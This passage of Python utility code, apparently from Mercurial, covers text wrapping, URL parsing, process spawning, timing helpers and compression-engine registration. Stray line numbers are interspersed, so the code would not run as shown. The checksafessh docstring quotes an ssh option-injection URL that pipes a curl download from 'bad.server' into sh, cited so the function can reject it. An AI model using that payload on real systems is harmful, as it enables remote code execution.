        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr into (head, tail) so head occupies at most
            # space_left display columns per encoding.ucolwidth.
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Replace this factory with the class itself so textwrap is imported
    # and the class is built only once; later calls construct tw directly.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2565
2569
def wrap(line, width, initindent='', hangindent=''):
    """Wrap a byte-string line to at most width display columns.

    initindent prefixes the first output line, hangindent all later ones.
    Input is decoded with the local encoding so wrapping is column-aware,
    then re-encoded before returning.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2581
2585
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #               | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # read via the raw fd with os.read so EINTR can be retried
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    # emit every complete line; keep the unterminated
                    # remainder (if any) for the next iteration
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return an iterator of lines over fp, safe against EINTR."""
        fastpath = True
        if type(fp) is file:
            # regular on-disk files are treated as "fast" and iterated
            # directly; only pipes/sockets/ttys need the safe path
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2653
2657
def iterlines(iterator):
    """Yield every line of every chunk produced by iterator."""
    for chunk in iterator:
        # splitlines() yields the lines without their terminators
        pieces = chunk.splitlines()
        for piece in pieces:
            yield piece
2658
2662
def expandpath(path):
    """Expand environment variables, then ~user constructs, in path."""
    path = os.path.expandvars(path)
    return os.path.expanduser(path)
2661
2665
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    # Not a frozen binary: delegate to the platform helper.
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2676
2680
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # os.wait() returns a (pid, status) tuple, and that tuple is what
        # gets stored here, so the 'pid in terminated' membership test
        # below never matches a bare pid; liveness is effectively decided
        # by testpid().
        # NOTE(review): storing os.wait()[0] would make the membership
        # test meaningful -- confirm intent before changing.
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD only exists on Unix; on Windows we rely on testpid() polling.
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # Re-check condfn() after the liveness test: the child may have
            # validated the condition just before exiting.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # Always restore the previous SIGCHLD disposition.
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2711
2715
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Work on a copy: the original code inserted the self-escape entry
        # directly into the caller's dict, mutating it as a side effect.
        mapping = mapping.copy()
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2736
2740
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    # Numeric specifications pass straight through.
    try:
        return int(port)
    except ValueError:
        name = pycompat.sysstr(port)
    # Otherwise resolve it as a service name via the system database.
    try:
        return socket.getservbyname(name)
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
2753
2757
# Recognized spellings of boolean configuration values.
_booleans = dict([(word, True)
                  for word in ('1', 'yes', 'true', 'on', 'always')] +
                 [(word, False)
                  for word in ('0', 'no', 'false', 'off', 'never')])

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    # Unknown spellings yield None so callers can tell "unset" from False.
    return _booleans.get(s.lower())
2764
2768
# Map every two-hex-digit string, in all case combinations, to the single
# character with that ordinal (used for percent-decoding).
_hextochr = {a + b: chr(int(a + b, 16))
             for a in string.hexdigits for b in string.hexdigits}
2767
2771
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # Characters left unescaped by quote() in userinfo and path components.
    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    # Matches a leading RFC 2396 scheme followed by ':'.
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        # _localpath: True while the input still looks like a plain
        # filesystem path rather than a scheme-qualified URL.
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        # Only components that were actually parsed appear in the repr.
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # Bracketed IPv6 literals must not be percent-escaped.
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        '''Return (url, authinfo) where url omits the credentials and
        authinfo is either None (no user) or the 4-tuple consumed by
        urllib2-style password managers.'''
        user, passwd = self.user, self.passwd
        try:
            # Temporarily strip credentials so bytes(self) omits them.
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        '''whether this URL is absolute: a remote scheme, a drive letter,
        a Windows UNC path, or a rooted POSIX path'''
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        '''Return the local filesystem path for file:// and bundle: URLs;
        any other URL is returned as the original input string.'''
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3071
3075
def hasscheme(path):
    """Report whether *path* parses with a URL scheme (e.g. 'http')."""
    parsed = url(path)
    return bool(parsed.scheme)
3074
3078
def hasdriveletter(path):
    """True if *path* begins with a Windows drive letter such as 'c:'."""
    if not path:
        # Preserve the original short-circuit: the falsy input itself is
        # returned, not False.
        return path
    return path[0:1].isalpha() and path[1:2] == ':'
3077
3081
def urllocalpath(path):
    """Return the local filesystem path for *path*, parsed as a raw URL
    (query string and fragment are treated as part of the path)."""
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
3080
3084
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # Unquote first so a percent-encoded '-' cannot smuggle an option in.
    decoded = urlreq.unquote(path)
    if decoded.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (decoded,))
3095
3099
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        # Mask rather than drop, so the output still shows a password
        # was present.
        parsed.passwd = '***'
    return bytes(parsed)
3102
3106
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Return bytes() like the sibling hidepassword(): on Python 3, str(u)
    # would hand callers a different string type than every other url
    # helper in this module produces.
    return bytes(u)
3108
3112
# Render a duration in seconds as a short human-readable string; built on
# unitcountfn (defined earlier in this file), with entries running from
# coarse (whole seconds) down to fine (nanoseconds).
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3124
3128
# Mutable cell tracking the indentation depth of nested @timed calls.
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    _step = 2

    def wrapper(*args, **kwargs):
        begin = timer()
        _timenesting[0] += _step
        try:
            return func(*args, **kwargs)
        finally:
            # Report even when func raised, then unwind the nesting level.
            duration = timer() - begin
            _timenesting[0] -= _step
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(duration)))
    return wrapper
3154 return wrapper
3151
3155
# Suffix table for sizetoint(); scanned in order, so the single-letter
# units come first and the bare 'b' fallback is last.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                magnitude = float(spec[:-len(suffix)])
                return int(magnitude * multiplier)
        # No recognized suffix: the whole string must be an integer.
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3173
3177
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # List of (source, hookfn) pairs; kept unsorted until invocation.
        self._hooks = []

    def add(self, source, hook):
        '''Register ``hook`` under the name ``source``.'''
        self._hooks.append((source, hook))

    def __call__(self, *args):
        '''Invoke every hook with ``args`` and return the list of results,
        ordered by source name.'''
        # Sort in place by source name so invocation order is deterministic
        # and repeated calls stay cheap (already mostly sorted).
        self._hooks.sort(key=lambda entry: entry[0])
        return [hookfn(*args) for _source, hookfn in self._hooks]
3191
3195
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    frames = traceback.extract_stack()[:-skip - 1]
    entries = []
    for fn, ln, func, _text in frames:
        entries.append((fileline % (pycompat.sysbytes(fn), ln),
                        pycompat.sysbytes(func)))
    # depth == 0 keeps everything: [-0:] is the whole list.
    entries = entries[-depth:]
    if not entries:
        return
    # Width of the widest file:line column, used to align the output.
    fnmax = max(len(fnln) for fnln, _func in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3214
3218
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    # Flush the other stream first so interleaved output stays readable.
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 hides this very function from the reported stack.
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3229
3233
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # Maps each ancestor directory name to the number of tracked
        # paths living under it.
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-like mapping: ignore entries whose state byte
            # equals 'skip' (e.g. removed files).
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            # Plain iterable of paths (e.g. a manifest).
            for f in map:
                addpath(f)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # Invariant: when a directory is already present, all of
                # its ancestors were counted when it was first added, so
                # bump only this one and stop.
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # Mirror image of addpath: once a directory survives the
                # decrement, so do all of its ancestors.
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3265
3269
# Prefer the C implementation of 'dirs' from the parsers module when it is
# available; it shadows the pure-Python class defined above.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3268
3272
def finddirs(path):
    '''Yield each ancestor directory of ``path``, deepest first.

    ``'a/b/c'`` yields ``'a/b'`` then ``'a'``; a path without a slash
    yields nothing.
    '''
    sep = path.rfind('/')
    while sep >= 0:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3274
3278
# compression code

# Role identifiers used when querying wire-protocol compression support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire-protocol support: the advertised format name
# plus the integer advertisement priorities for the server and client sides
# (non-positive priorities are not advertised).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3283
3287
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to compressionengine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        # Look an engine up by its registered name; raises KeyError.
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises ``error.Abort`` if any identifier the engine declares
        (engine name, bundle name/type, wire type, revlog header) is
        already claimed by a previously registered engine. All
        collision checks for a given section run before that section's
        mappings are mutated.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        # Set of user-facing "bundle spec" compression names.
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        # Set of internal bundle compression identifiers.
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire proto identifier.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
